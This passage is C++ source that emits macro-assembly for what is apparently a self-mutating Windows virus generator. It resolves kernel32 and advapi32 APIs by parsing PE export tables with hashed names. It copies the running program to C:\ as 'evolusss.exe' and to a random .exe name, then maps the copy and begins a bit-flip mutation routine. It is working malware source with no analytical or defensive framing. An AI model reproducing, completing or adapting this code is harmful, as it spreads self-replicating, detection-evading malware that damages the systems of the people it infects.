727. file << "       _nopsA                   ; restore RegA=Addresse Tables" << endl; CreateAnIntron();
728. file << "       _getdata                 ; Pointer To Addresse Table" << endl; CreateAnIntron();
729. file << "       _addsaved                ; relative -> absolut" << endl; CreateAnIntron();
730. file << "       _writeDWord              ; mov dword[hAddressTable], (Pointer to Addresse Table)" << endl; CreateAnIntron();
731.  
732. GetAddress("hNamePointerTable");
733. file << "       _saveWrtOff              ; WriteOffset=hNamePointerTable" << endl; CreateAnIntron();
734.  
735. file << "       _nopsA                   ; BC1=Addresse Table" << endl; CreateAnIntron();
736. addnumber("4");
737. file << "       _nopdA" << endl; CreateAnIntron();
738.  
739. file << "       _getdata                 ; Pointer To Name Table" << endl; CreateAnIntron();
740. file << "       _addsaved                ; relative -> absolut" << endl; CreateAnIntron();
741. file << "       _writeDWord              ; mov dword[hNamePointerTable], (Pointer to Name Pointer Table)" << endl; CreateAnIntron();
742.  
743. GetAddress("hOrdinalTable");
744. file << "       _saveWrtOff              ; WriteOffset=hOrdinalTable" << endl; CreateAnIntron();
745.  
746. file << "       _nopsA" << endl; CreateAnIntron();
747. addnumber("4");
748.  
749. file << "       _getdata                 ; Ordinal Table" << endl; CreateAnIntron();
750. file << "       _addsaved                ; relative -> absolut" << endl; CreateAnIntron();
751. file << "       _writeDWord              ; mov dword[hOrdinalTable], (Pointer to Ordinal Table)" << endl; CreateAnIntron();
752.  
753.  
754.  
755. GetAddress("APINumber");
756. file << "       _saveWrtOff" << endl; CreateAnIntron();
757. zer0(1);
758. addnumber("APINumberKernel");
759. file << "       _writeDWord              ; Save number of kernel32.dll APIs" << endl; CreateAnIntron();
760.  
761.  
762. GetAddress("hAddressePointer");
763. file << "       _saveWrtOff" << endl; CreateAnIntron();
764. GetAddress("APIAddresses");
765. file << "       _writeDWord      ; Saves the AddressePointer" << endl; CreateAnIntron();
766.  
767.  
768. GetAddress("hMagicNumberPointer");
769. file << "       _saveWrtOff" << endl; CreateAnIntron();
770. GetAddress("APIMagicNumbersKernel");
771. file << "       _writeDWord      ; Saves the MagicNumber Pointer" << endl; CreateAnIntron();
772.  
773. zer0(0);
774. addnumber("43");
775. file << "       _push" << endl; CreateAnIntron();
776.  
777. file << "; FindAllAPIs" << endl; CreateAnIntron();
778. file << "       _getEIP" << endl; CreateAnIntron();
779. file << "       _sub0001" << endl; CreateAnIntron();
780. file << "       _sub0001" << endl; CreateAnIntron();
781. file << "       _sub0001" << endl; CreateAnIntron();
782. file << "       _sub0001" << endl; CreateAnIntron();
783. file << "       _sub0001" << endl; CreateAnIntron();
784. file << "       _saveJmpOff      ; mov BA2, eip  - for further API searching in different DLLs" << endl; CreateAnIntron();
785.  
786. file << "       _pushall" << endl; CreateAnIntron();
787.  
788. zer0(0);
789. file << "               _nopdB          ; RegB = Counter for first instance loop = 0" << endl; CreateAnIntron();
790.  
791. GetAddress("hAddressePointer");
792. file << "               _getdata" << endl; CreateAnIntron();
793. file << "               _nopdA           ; RegA = Pointer to Buffer for API Addresse" << endl; CreateAnIntron();
794.  
795. GetAddress("hMagicNumberPointer");
796. file << "               _getdata" << endl; CreateAnIntron();
797. file << "               _nopdD           ; RegD = Pointer to Magic Numbers for APIs" << endl; CreateAnIntron();
798.  
799.  
800.  
801. file << "           ; FindAllAPIsNext" << endl; CreateAnIntron();
802. file << "               _getEIP" << endl; CreateAnIntron();
803. file << "               _sub0001" << endl; CreateAnIntron();
804. file << "               _sub0001" << endl; CreateAnIntron();
805. file << "               _sub0001" << endl; CreateAnIntron();
806. file << "               _sub0001" << endl; CreateAnIntron();
807. file << "               _sub0001" << endl; CreateAnIntron();
808. file << "               _saveJmpOff      ; mov BA2, eip" << endl; CreateAnIntron();
809.  
810.  
811. file << "               _pushall" << endl; CreateAnIntron();
812. file << "                       ; RegA=free  | used for pointer within the Name Pointer Table" << endl; CreateAnIntron();
813. file << "                       ; RegB=free  | used as temporary buffer" << endl; CreateAnIntron();
814. file << "                       ; RegD=MagicNumber for API" << endl; CreateAnIntron();
815. file << "                       ; Stack:  | counter (number of APIs checked in kernel32.dll)" << endl; CreateAnIntron();
816.  
817. GetAddress("hNamePointerTable");
818. file << "                       _getdata" << endl; CreateAnIntron();
819. file << "                       _nopdA               ; Pointer to Name Pointer Table (points to first API)" << endl; CreateAnIntron();
820.  
821. zer0(0);
822. file << "                       _sub0001" << endl; CreateAnIntron();
823. file << "                       _push                ; counter" << endl; CreateAnIntron();
824.  
825. file << "                  ; SearchNextAPI:" << endl; CreateAnIntron();
826. file << "                       _getEIP" << endl; CreateAnIntron();
827. file << "                       _sub0001" << endl; CreateAnIntron();
828. file << "                       _sub0001" << endl; CreateAnIntron();
829. file << "                       _sub0001" << endl; CreateAnIntron();
830. file << "                       _sub0001" << endl; CreateAnIntron();
831. file << "                       _sub0001" << endl; CreateAnIntron();
832. file << "                       _saveJmpOff          ; mov BA2, eip" << endl; CreateAnIntron();
833.  
834. file << "                       _pop" << endl; CreateAnIntron();
835. addnumber("0x1");
836. file << "                       _push" << endl; CreateAnIntron();
837.  
838. GetAddress("hDLLlibrary32");
839. file << "                       _getdata" << endl; CreateAnIntron();
840. file << "                       _save                ; kernel32.dll position" << endl; CreateAnIntron();
841.  
842. file << "                       _nopsA               ; Pointer to NamePointerTable" << endl; CreateAnIntron();
843. file << "                       _getdata             ; Points to API name" << endl; CreateAnIntron();
844. file << "                       _addsaved            ; relative -> absolut" << endl; CreateAnIntron();
845. file << "                       _sub0001             ; -- (for algorithm)" << endl; CreateAnIntron();
846. file << "                       _nopdB              ; save Pointer to API name" << endl; CreateAnIntron();
847.  
848.  
849. file << "                       _nopsA" << endl; CreateAnIntron();
850. addnumber("4");
851. file << "                       _nopdA               ; Has just effects in next loop" << endl; CreateAnIntron();
852.  
853. file << "                       _pushall" << endl; CreateAnIntron();
854. zer0(0);
855. file << "                               _nopdA" << endl; CreateAnIntron();
856.  
857. file << "                               _getEIP" << endl; CreateAnIntron();
858. file << "                               _sub0001" << endl; CreateAnIntron();
859. file << "                               _sub0001" << endl; CreateAnIntron();
860. file << "                               _sub0001" << endl; CreateAnIntron();
861. file << "                               _sub0001" << endl; CreateAnIntron();
862. file << "                               _sub0001" << endl; CreateAnIntron();
863. file << "                               _saveJmpOff          ; mov BA2, eip" << endl; CreateAnIntron();
864.  
865. file << "                               _nopsA" << endl; CreateAnIntron();
866. file << "                               _save                ; RegA=MagicNumber" << endl; CreateAnIntron();
867.  
868. file << "                               _nopsB" << endl; CreateAnIntron();
869. addnumber("1");
870. file << "                               _nopdB              ; BC1=NamePointer++" << endl; CreateAnIntron();
871.  
872. file << "                               _getdata             ; BC1=dword[NamePointer+n]" << endl; CreateAnIntron();
873.  
874. file << "                               _addsaved            ; BC1=BC1 + BC2 = dword[NamePointer+n] xor MagicNumber" << endl; CreateAnIntron();
875. file << "                               _nopdA" << endl; CreateAnIntron();
876.  
877. zer0(0);
878. addnumber("8");
879. file << "                               _save" << endl; CreateAnIntron();
880.  
881. file << "                               _nopsB" << endl; CreateAnIntron();
882. file << "                               _getdata             ; BC1=nxxx" << endl; CreateAnIntron();
883. file << "                               _shr                 ; BC1=???n" << endl; CreateAnIntron();
884. file << "                               _push" << endl; CreateAnIntron();
885.  
886. zer0(0);
887. addnumber("0xFF");
888. file << "                               _save                ; BC2=0xFF" << endl; CreateAnIntron();
889. file << "                               _pop                 ; BC1=???n" << endl; CreateAnIntron();
890. file << "                               _and                 ; BC1=000n" << endl; CreateAnIntron();
891.  
892. file << "                               _JnzUp" << endl; CreateAnIntron();
893.  
894. GetAddress("APITmpBuffer");
895. file << "                               _saveWrtOff" << endl; CreateAnIntron();
896. file << "                               _nopsA" << endl; CreateAnIntron();
897. file << "                               _writeDWord          ; mov dword[APITmpBuffer], RegA" << endl; CreateAnIntron();
898.  
899. file << "                       _popall" << endl; CreateAnIntron();
900.  
901. GetAddress("APITmpBuffer");
902. file << "                       _getdata" << endl; CreateAnIntron();
903. file << "                       _nopdB              ; save MagicNumber of this API" << endl; CreateAnIntron();
904.  
905.  
906. zer0(0);
907. addnumber("0x0FFF");
908. file << "                       _save                ; save 0x0FFF in BC2" << endl; CreateAnIntron();
909.  
910. file << "                       _nopsB" << endl; CreateAnIntron();
911. file << "                       _and                 ; BC1=dword[MagicNumberOfThisAPI] && 0x0FFF" << endl; CreateAnIntron();
912. file << "                       _nopdB" << endl; CreateAnIntron();
913.  
914. file << "                       _nopsD               ; Get Pointer to API MagicWord" << endl; CreateAnIntron();
915. file << "                       _getdata" << endl; CreateAnIntron();
916. file << "                       _and                 ; BC1=dword[MagicNumberSearchAPI] && 0x0FFF" << endl; CreateAnIntron();
917. file << "                       _save                ; save" << endl; CreateAnIntron();
918.  
919. file << "                       _nopsB               ; Get MagicNumber of current API again" << endl; CreateAnIntron();
920. file << "                       _xor                 ; (dword[MagicNumberSearchAPI] && 0x0FFF) XOR dword[MagicNumberOfThisAPI] && 0x0FFF" << endl; CreateAnIntron();
921. file << "                                            ; If zero, assume that we found API" << endl; CreateAnIntron();
922. file << "                   _JnzUp" << endl; CreateAnIntron();
923.  
924.  
925. zer0(0);
926. addnumber("1");
927. file << "                       _save                ; BC2=1" << endl; CreateAnIntron();
928.  
929. file << "                       _pop                 ; Get Counter from Stack" << endl; CreateAnIntron();
930. file << "                       _shl                 ; BC1=counter*2 (because Ordinal Table has just 2byte Entries)" << endl; CreateAnIntron();
931. file << "                                               ; (=no DLLs with more than 65535 functions?!)" << endl; CreateAnIntron();
932. file << "                       _save" << endl; CreateAnIntron();
933.  
934. GetAddress("hOrdinalTable");
935. file << "                       _getdata" << endl; CreateAnIntron();
936. file << "                       _addsaved            ; Points to ordinal number of the API" << endl; CreateAnIntron();
937.  
938. file << "                       _push" << endl; CreateAnIntron();
939. zer0(0);
940. addnumber("0xFFFF");
941. file << "                       _save" << endl; CreateAnIntron();
942. file << "                       _pop                 ; BC2=0xFFFF" << endl; CreateAnIntron();
943.  
944. file << "                       _getdata             ; BC1=Ordinal Number of API" << endl; CreateAnIntron();
945. file << "                                               ; Ordinal Number is a word, so we have to set the high word to zero" << endl; CreateAnIntron();
946. file << "                       _and                 ; BC1=dword[Ordinal] && 0xFFFF" << endl; CreateAnIntron();
947.  
948. file << "                       _push" << endl; CreateAnIntron();
949. zer0(0);
950. addnumber("2");
951. file << "                       _save" << endl; CreateAnIntron();
952. file << "                       _pop" << endl; CreateAnIntron();
953. file << "                       _shl                 ; BC1=Ordinal*4, as Addresse to Function is a dword" << endl; CreateAnIntron();
954.  
955. file << "                       _save" << endl; CreateAnIntron();
956.  
957. GetAddress("hAddressTable");
958. file << "                       _getdata" << endl; CreateAnIntron();
959.  
960. file << "                       _addsaved            ; BC1 points to Addresse of API Function" << endl; CreateAnIntron();
961. file << "                       _getdata             ; BC1=Addresse of API Function" << endl; CreateAnIntron();
962. file << "                       _save" << endl; CreateAnIntron();
963.  
964. GetAddress("hDLLlibrary32");
965. file << "                       _getdata" << endl; CreateAnIntron();
966. file << "                       _addsaved            ; relative -> absolut" << endl; CreateAnIntron();
967. file << "                                               ; BC1 contains the Addresse of the API in (kernel32) memory" << endl; CreateAnIntron();
968.  
969.  
970. file << "                       _nopdB              ; save the Addresse in RegB" << endl; CreateAnIntron();
971. GetAddress("hAddressePointer");
972. file << "                       _getdata             ; Pointer to the buffer where we save the API addresse" << endl; CreateAnIntron();
973. file << "                       _saveWrtOff          ; We will write to this Addresse" << endl; CreateAnIntron();
974.  
975. file << "                       _nopsB               ; restore API Addresse" << endl; CreateAnIntron();
976.  
977. file << "                       _writeDWord          ; Save the API Function Addresse in the Function Buffer!!!" << endl; CreateAnIntron();
978.  
979.  
980. file << "               _popall" << endl; CreateAnIntron();
981.  
982. GetAddress("hAddressePointer");
983. file << "               _saveWrtOff      ; The buffer where we save the pointer" << endl; CreateAnIntron();
984.  
985. file << "               _nopsA" << endl; CreateAnIntron();
986. addnumber("0x4");
987.  
988. file << "               _writeDWord      ; save pointer" << endl; CreateAnIntron();
989. file << "               _nopdA           ; save different (prevents a more messy code)" << endl; CreateAnIntron();
990.  
991. file << "               _nopsD           ; Next Magic Number for API" << endl; CreateAnIntron();
992. addnumber("0x4");
993. file << "               _nopdD" << endl; CreateAnIntron();
994.  
995. file << "               _nopsB" << endl; CreateAnIntron();
996. addnumber("0x1");
997. file << "               _nopdB" << endl; CreateAnIntron();
998. file << "               _save" << endl; CreateAnIntron();
999.  
1000. GetAddress("APINumber");
1001. file << "               _getdata" << endl; CreateAnIntron();
1002.  
1003.  
1004. subsaved(0);
1005. file << "               _JnzUp           ; Jnz FindAllAPIsNext" << endl; CreateAnIntron();
1006.  
1007. file << "           ; end FindAllAPIsNext" << endl; CreateAnIntron();
1008.  
1009. file << "       _popall" << endl; CreateAnIntron();
1010. file << "       ; FoundAPI" << endl; CreateAnIntron();
1011.  
1012. file << "; end FindAllAPIs in kernel32.dll" << endl; CreateAnIntron();
1013.  
1014. GetAddress("stDLLadvapi32");
1015. file << "       _push" << endl; CreateAnIntron();
1016. file << "       _CallAPILoadLibrary      ; invoke LoadLibrary, " << static_cast<char>(34) << "kernel32.dll" << static_cast<char>(34) << "" << endl; CreateAnIntron();
1017.  
1018.  
1019. GetAddress("hDLLlibrary32");
1020. file << "       _saveWrtOff" << endl; CreateAnIntron();
1021.  
1022.  
1023. file << "       _nopsA" << endl; CreateAnIntron();
1024. file << "       _writeDWord              ; mov dword[hDLLkernel32], eax" << endl; CreateAnIntron();
1025.  
1026. file << "       _save                    ; Save kernel32.dll position" << endl; CreateAnIntron();
1027.  
1028. addnumber("0x3C");
1029. file << "       _getdata                 ; mov RegB, dword[hDLLkernel32+0x3C]" << endl; CreateAnIntron();
1030.  
1031. file << "                                   ; = Pointer to PE Header of kernel32.dll" << endl; CreateAnIntron();
1032. file << "       _addsaved                ; relative -> absolut" << endl; CreateAnIntron();
1033.  
1034. addnumber("0x78");
1035. file << "       _getdata                 ; Export Tables" << endl; CreateAnIntron();
1036. file << "       _addsaved                ; relative -> absolut" << endl; CreateAnIntron();
1037. addnumber("0x1C");
1038.  
1039. file << "       _nopdA                   ; temporarily save Offset of Addresse Table in RegA" << endl; CreateAnIntron();
1040.  
1041. GetAddress("hAddressTable");
1042. file << "       _saveWrtOff              ; WriteOffset=hAddressTable" << endl; CreateAnIntron();
1043.  
1044. file << "       _nopsA                   ; restore RegA=Addresse Tables" << endl; CreateAnIntron();
1045. file << "       _getdata                 ; Pointer To Addresse Table" << endl; CreateAnIntron();
1046. file << "       _addsaved                ; relative -> absolut" << endl; CreateAnIntron();
1047. file << "       _writeDWord              ; mov dword[hAddressTable], (Pointer to Addresse Table)" << endl; CreateAnIntron();
1048.  
1049. GetAddress("hNamePointerTable");
1050. file << "       _saveWrtOff              ; WriteOffset=hNamePointerTable" << endl; CreateAnIntron();
1051.  
1052. file << "       _nopsA                   ; BC1=Addresse Table" << endl; CreateAnIntron();
1053. addnumber("4");
1054. file << "       _nopdA" << endl; CreateAnIntron();
1055.  
1056. file << "       _getdata                 ; Pointer To Name Table" << endl; CreateAnIntron();
1057. file << "       _addsaved                ; relative -> absolut" << endl; CreateAnIntron();
1058. file << "       _writeDWord              ; mov dword[hNamePointerTable], (Pointer to Name Pointer Table)" << endl; CreateAnIntron();
1059.  
1060. GetAddress("hOrdinalTable");
1061. file << "       _saveWrtOff              ; WriteOffset=hOrdinalTable" << endl; CreateAnIntron();
1062.  
1063. file << "       _nopsA" << endl; CreateAnIntron();
1064. addnumber("4");
1065.  
1066. file << "       _getdata                 ; Ordinal Table" << endl; CreateAnIntron();
1067. file << "       _addsaved                ; relative -> absolut" << endl; CreateAnIntron();
1068. file << "       _writeDWord              ; mov dword[hOrdinalTable], (Pointer to Ordinal Table)" << endl; CreateAnIntron();
1069.  
1070.  
1071. GetAddress("APINumber");
1072. file << "       _saveWrtOff" << endl; CreateAnIntron();
1073. zer0(0);
1074. addnumber("APINumberAdvapi");
1075. file << "       _writeDWord              ; Save number of kernel32.dll APIs" << endl; CreateAnIntron();
1076.  
1077. GetAddress("hAddressePointer");
1078. file << "       _saveWrtOff" << endl; CreateAnIntron();
1079. GetAddress("APIAddressesReg");
1080. file << "       _writeDWord      ; Saves the AddressePointer" << endl; CreateAnIntron();
1081.  
1082.  
1083. GetAddress("hMagicNumberPointer");
1084. file << "       _saveWrtOff" << endl; CreateAnIntron();
1085. GetAddress("APIMagicNumbersReg");
1086. file << "       _writeDWord      ; Saves the MagicNumber Pointer" << endl; CreateAnIntron();
1087.  
1088.  
1089. zer0(0);
1090. addnumber("42");
1091. file << "       _save" << endl; CreateAnIntron();
1092. file << "       _pop" << endl; CreateAnIntron();
1093. file << "       _sub0001" << endl; CreateAnIntron();
1094. file << "       _push" << endl; CreateAnIntron();
1095. addnumber("1");
1096. file << "       _xor" << endl; CreateAnIntron();
1097. file << "       _JnzUp" << endl; CreateAnIntron();
1098.  
1099. file << "       _pop                    ; Remove trash from stack" << endl; CreateAnIntron();
1100.  
1101.  
1102. zer0(0);
1103. addnumber("0x8007");
1104. file << "       _push" << endl; CreateAnIntron();
1105. CallAPI("hSetErrorMode");
1106.  
1107. CallAPI("hGetTickCount");
1108.  
1109.  
1110. file << "; ############################################################################" << endl; CreateAnIntron();
1111. file << "; ############################################################################" << endl; CreateAnIntron();
1112. file << "; ############################################################################" << endl; CreateAnIntron();
1113. file << "; #####" << endl; CreateAnIntron();
1114. file << "; #####   First child ..." << endl; CreateAnIntron();
1115. file << "; #####" << endl; CreateAnIntron();
1116.  
1117.  
1118. GetAddress("RandomNumber");
1119. file << "       _saveWrtOff" << endl; CreateAnIntron();
1120. file << "       _nopsA" << endl; CreateAnIntron();
1121. file << "       _writeDWord              ; mov dword[RandomNumber], RegA" << endl; CreateAnIntron();
1122.  
1123. zer0(0);
1124. file << "       _nopdB                  ; mov RegB, 0" << endl; CreateAnIntron();
1125.  
1126.  
1127. file << ";   RndNameLoop:" << endl; CreateAnIntron();
1128. file << "       _getEIP" << endl; CreateAnIntron();
1129. file << "       _sub0001" << endl; CreateAnIntron();
1130. file << "       _sub0001" << endl; CreateAnIntron();
1131. file << "       _sub0001" << endl; CreateAnIntron();
1132. file << "       _sub0001" << endl; CreateAnIntron();
1133. file << "       _sub0001" << endl; CreateAnIntron();
1134. file << "       _saveJmpOff              ; mov esi, eip" << endl; CreateAnIntron();
1135.  
1136. GetAddress("RandomNumber");
1137.  
1138. file << "       _getdata" << endl; CreateAnIntron();
1139. file << "       _nopdA                   ; mov eax, [RandomNumber]" << endl; CreateAnIntron();
1140.  
1141.  
1142. zer0(0);
1143. file << "       _nopdD                   ; mov edx, 0" << endl; CreateAnIntron();
1144.  
1145. addnumber("26");
1146.  
1147. file << "       _div                     ; div ebx" << endl; CreateAnIntron();
1148.  
1149. file << "       _nopsD" << endl; CreateAnIntron();
1150. addnumber("97");
1151. file << "       _nopdD                   ; add edx, 97" << endl; CreateAnIntron();
1152.  
1153. file << "       _nopsB      ; ebx=ebp=count" << endl; CreateAnIntron();
1154. file << "       _save       ; ebp=ebx=ecx=count" << endl; CreateAnIntron();
1155.  
1156. GetAddress("RandomFileName");
1157. file << "                      ; ebx=rfn, ebp=ecx=count" << endl; CreateAnIntron();
1158. file << "       _addsaved   ; ebx=rfn+count, ebp=ecx=count" << endl; CreateAnIntron();
1159. file << "       _saveWrtOff ; edi=rfn+count, ebx=rfn+count, ebp=ecx=count" << endl; CreateAnIntron();
1160.  
1161.  
1162. file << "       _nopsD" << endl; CreateAnIntron();
1163. file << "       _writeByte               ; mov byte[ecx+RandomFileName], dl" << endl; CreateAnIntron();
1164.  
1165. CalcNewRandNumberAndSaveIt();
1166.  
1167. file << "       _nopsB" << endl; CreateAnIntron();
1168. addnumber("1");
1169. file << "       _nopdB" << endl; CreateAnIntron();
1170. file << "       _save                    ; inc counter" << endl; CreateAnIntron();
1171.  
1172. zer0(1);
1173. addnumber("8");
1174. subsaved(0);
1175.  
1176.  
1177. file << "       _JnzUp                   ; jnz esi" << endl; CreateAnIntron();
1178. file << "; loop RndNameLoop" << endl; CreateAnIntron();
1179.  
1180. GetAddress("rndext");
1181. file << "       _saveWrtOff" << endl; CreateAnIntron();
1182. zer0(0);
1183. addnumber("\'.exe\'");
1184. file << "       _writeDWord              ; create extention" << endl; CreateAnIntron();
1185.  
1186. CallAPI("hGetCommandLineA");
1187. zer0(0);
1188. addnumber("0xFF");
1189. file << "       _save" << endl; CreateAnIntron();
1190.  
1191. file << "       _nopsA" << endl; CreateAnIntron();
1192. file << "       _getdata" << endl; CreateAnIntron();
1193. file << "       _and" << endl; CreateAnIntron();
1194.  
1195. file << "       _nopdB           ; RegB=1st byte of filename" << endl; CreateAnIntron();
1196. zer0(0);
1197. addnumber("34");
1198. file << "       _nopdD           ; RegD=34" << endl; CreateAnIntron();
1199.  
1200.  
1201. file << "       _nopsB" << endl; CreateAnIntron();
1202. file << "       _save" << endl; CreateAnIntron();
1203. file << "       _nopsD" << endl; CreateAnIntron();
1204. subsaved(0);
1205.  
1206. file << "       _JnzDown" << endl;
1207. file << "           _nopsA" << endl;
1208. file << "           _add0001" << endl;
1209. file << "           _nopdA" << endl;
1210. file << "           _nopREAL" << endl;
1211.  
1212. file << "       _nopsA" << endl; CreateAnIntron();
1213. file << "       _push               ; Save RegA at stack" << endl; CreateAnIntron();
1214.  
1215. file << "; FindEndOfString:" << endl; CreateAnIntron();
1216. file << "       _getEIP" << endl; CreateAnIntron();
1217. file << "       _sub0001" << endl; CreateAnIntron();
1218. file << "       _sub0001" << endl; CreateAnIntron();
1219. file << "       _sub0001" << endl; CreateAnIntron();
1220. file << "       _sub0001" << endl; CreateAnIntron();
1221. file << "       _sub0001" << endl; CreateAnIntron();
1222. file << "       _saveJmpOff         ; mov esi, eip" << endl; CreateAnIntron();
1223.  
1224. file << "       _nopsA" << endl; CreateAnIntron();
1225. addnumber("1");
1226. file << "       _nopdA" << endl; CreateAnIntron();
1227.  
1228. zer0(0);
1229. addnumber("0xFF");
1230. file << "       _save" << endl; CreateAnIntron();
1231. file << "       _nopsA" << endl; CreateAnIntron();
1232. file << "       _getdata" << endl; CreateAnIntron();
1233. file << "       _and" << endl; CreateAnIntron();
1234. file << "       _nopdD               ; RegD=(dword[Name+count]&& 0xFF)" << endl; CreateAnIntron();
1235.  
1236. zer0(0);
1237. addnumber("34");
1238. file << "       _save" << endl; CreateAnIntron();
1239. file << "       _nopsB               ; 1st Byte of filename" << endl; CreateAnIntron();
1240. subsaved(1);
1241.  
1242. file << "       _JnzDown" << endl;
1243. file << "           _nopsD" << endl;
1244. file << "           _xor" << endl;
1245. file << "           _JnzUp" << endl;
1246. file << "           _nopREAL" << endl;
1247. file << "; EndFindEndOfString:" << endl; CreateAnIntron();
1248.  
1249. file << "       _nopsA" << endl; CreateAnIntron();
1250. file << "       _saveWrtOff" << endl; CreateAnIntron();
1251.  
1252. zer0(1);
1253. addnumber("34");
1254. file << "       _nopsB               ; 1st Byte of filename" << endl; CreateAnIntron();
1255. subsaved(0);
1256. file << "       _JnzDown" << endl;
1257. file << "           _save" << endl;
1258. file << "           _xor" << endl;
1259. file << "           _writeByte" << endl;
1260. file << "           _nopREAL" << endl;
1261.  
1262. file << "       _pop" << endl; CreateAnIntron();
1263. file << "       _nopdA" << endl; CreateAnIntron();
1264.  
1265.  
1266. GetAddress("Driveletter3-1");
1267. file << "       _saveWrtOff" << endl; CreateAnIntron();
1268. zer0(0);
1269. addnumber("0x5C3A4300");
1270. file << "       _writeDWord" << endl; CreateAnIntron();
1271.  
1272. GetAddress("virusname");
1273. file << "       _saveWrtOff" << endl; CreateAnIntron();
1274. zer0(0);
1275. addnumber("\'evol\'");
1276. file << "       _writeDWord" << endl; CreateAnIntron();
1277.  
1278. GetAddress("virusname+4");
1279. file << "       _saveWrtOff" << endl; CreateAnIntron();
1280. zer0(0);
1281. addnumber("\'usss\'");
1282. file << "       _writeDWord                  ; Construct virusfilename" << endl; CreateAnIntron();
1283.  
1284. GetAddress("virext");
1285. file << "       _saveWrtOff" << endl; CreateAnIntron();
1286. zer0(0);
1287. addnumber("\'.exe\'");
1288. file << "       _writeDWord                  ; create extention" << endl; CreateAnIntron();
1289.  
1290. file << "       _nopsA" << endl; CreateAnIntron();
1291. file << "       _push                       ; Save pointer to filename buffer" << endl; CreateAnIntron();
1292. zer0(0);
1293. file << "       _push" << endl; CreateAnIntron();
1294. GetAddress("Driveletter3");
1295. file << "       _push" << endl; CreateAnIntron();
1296. file << "       _nopsA" << endl; CreateAnIntron();
1297. file << "       _push" << endl; CreateAnIntron();
1298. CallAPI("hCopyFileA");
1299.  
1300. file << "       _pop" << endl; CreateAnIntron();
1301. file << "       _nopdA" << endl; CreateAnIntron();
1302. zer0(0);
1303. file << "       _push" << endl; CreateAnIntron();
1304. GetAddress("RandomFileName");
1305. file << "       _push" << endl; CreateAnIntron();
1306. file << "       _nopsA" << endl; CreateAnIntron();
1307. file << "       _push" << endl; CreateAnIntron();
1308. CallAPI("hCopyFileA");
1309.  
1310. zer0(0);
1311. file << "       _push" << endl; CreateAnIntron();
1312. file << "       _push" << endl; CreateAnIntron();
1313. addnumber("3");
1314. file << "       _push" << endl; CreateAnIntron();
1315. zer0(0);
1316. file << "       _push" << endl; CreateAnIntron();
1317. addnumber("1");
1318. file << "       _push" << endl; CreateAnIntron();
1319. file << "       _sub0001" << endl; CreateAnIntron();
1320. addnumber("0xC0000000");
1321. file << "       _push" << endl; CreateAnIntron();
1322. GetAddress("RandomFileName");
1323. file << "       _push" << endl; CreateAnIntron();
1324. CallAPI("hCreateFileA");
1325.  
1326.  
1327. GetAddress("FileHandle");
1328. file << "       _saveWrtOff" << endl; CreateAnIntron();
1329. file << "       _nopsA" << endl; CreateAnIntron();
1330. file << "       _writeDWord              ; mov dword[FileHandle], RegA" << endl; CreateAnIntron();
1331.  
1332. file << "       _save" << endl; CreateAnIntron();
1333.  
1334. GetAddress("FileSize");
1335.  
1336. file << "       _push" << endl; CreateAnIntron();
1337. zer0(1);
1338. file << "       _addsaved" << endl; CreateAnIntron();
1339. file << "       _push" << endl; CreateAnIntron();
1340. CallAPI("hGetFileSize");
1341.  
1342. GetAddress("FileSize");
1343. file << "       _saveWrtOff" << endl; CreateAnIntron();
1344. file << "       _nopsA" << endl; CreateAnIntron();
1345. file << "       _writeDWord              ; mov dword[FileSize], RegA" << endl; CreateAnIntron();
1346.  
1347. zer0(1);
1348. file << "       _push" << endl; CreateAnIntron();
1349. file << "       _addsaved" << endl; CreateAnIntron();
1350. file << "       _push" << endl; CreateAnIntron();
1351. zer0(0);
1352. file << "       _push" << endl; CreateAnIntron();
1353. addnumber("4");
1354. file << "       _push" << endl; CreateAnIntron();
1355. zer0(0);
1356. file << "       _push" << endl; CreateAnIntron();
1357. GetAddress("FileHandle");
1358. file << "       _getdata" << endl; CreateAnIntron();
1359. file << "       _push" << endl; CreateAnIntron();
1360. CallAPI("hCreateFileMappingA");
1361.  
1362. GetAddress("MapHandle");
1363.  
1364. file << "       _saveWrtOff" << endl; CreateAnIntron();
1365. file << "       _nopsA" << endl; CreateAnIntron();
1366. file << "       _writeDWord               ; mov dword[MapHandle], RegA" << endl; CreateAnIntron();
1367.  
1368. file << "       _save" << endl; CreateAnIntron();
1369. GetAddress("FileSize");
1370.  
1371. file << "       _getdata" << endl; CreateAnIntron();
1372. file << "       _push   ; [FileSize]" << endl; CreateAnIntron();
1373. zer0(1);
1374. file << "       _push   ; 0" << endl; CreateAnIntron();
1375. file << "       _push   ; 0" << endl; CreateAnIntron();
1376. addnumber("2");
1377. file << "       _push" << endl; CreateAnIntron();
1378. zer0(1);
1379. file << "       _addsaved" << endl; CreateAnIntron();
1380. file << "       _push   ; MapHandle" << endl; CreateAnIntron();
1381.  
1382. CallAPI("hMapViewOfFile");
1383.  
1384. GetAddress("MapPointer");
1385.  
1386. file << "       _saveWrtOff" << endl; CreateAnIntron();
1387. file << "       _nopsA" << endl; CreateAnIntron();
1388. file << "       _writeDWord              ; mov dword[MapPointer], RegA" << endl; CreateAnIntron();
1389.  
1390. file << "       _nopsA" << endl; CreateAnIntron();
1391. file << "       _nopdB                  ; mov RegB, RegA+AminoStartInMap" << endl; CreateAnIntron();
1392.  
1393.  
1394.  
1395.  
1396. file << "; ############################################################################" << endl; CreateAnIntron();
1397. file << "; ############################################################################" << endl; CreateAnIntron();
1398. file << "; #####" << endl; CreateAnIntron();
1399. file << "; #####  Here the mutation happens: Bitmutation, exchange of codons, ..." << endl; CreateAnIntron();
1400. file << "; #####" << endl; CreateAnIntron();
1401.  
1402. file << ";ANextByteInChain:" << endl; CreateAnIntron();
1403. file << "       _getEIP" << endl; CreateAnIntron();
1404. file << "       _sub0001" << endl; CreateAnIntron();
1405. file << "       _sub0001" << endl; CreateAnIntron();
1406. file << "       _sub0001" << endl; CreateAnIntron();
1407. file << "       _sub0001" << endl; CreateAnIntron();
1408. file << "       _sub0001" << endl; CreateAnIntron();
1409. file << "       _saveJmpOff              ; mov BA2, eip" << endl; CreateAnIntron();
1410.  
1411. file << "       _nopsB" << endl; CreateAnIntron();
1412. file << "       _push                    ; push counter" << endl; CreateAnIntron();
1413.  
1414.  
1415. file << "; ############################################################################" << endl; CreateAnIntron();
1416. file << "; ##### Start Bit-Flip Mutation (Point-Mutation)" << endl; CreateAnIntron();
1417.  
1418. zer0(0);
1419. addnumber("12");
1420. file << "       _save" << endl; CreateAnIntron();
1421.  
1422. GetAddress("RandomNumber");
1423.  
1424. file << "       _getdata" << endl; CreateAnIntron();
1425. file << "       _shr" << endl; CreateAnIntron();
1426. file << "       _push" << endl; CreateAnIntron();
1427.  
1428. zer0(0);
1429. addnumber("7");
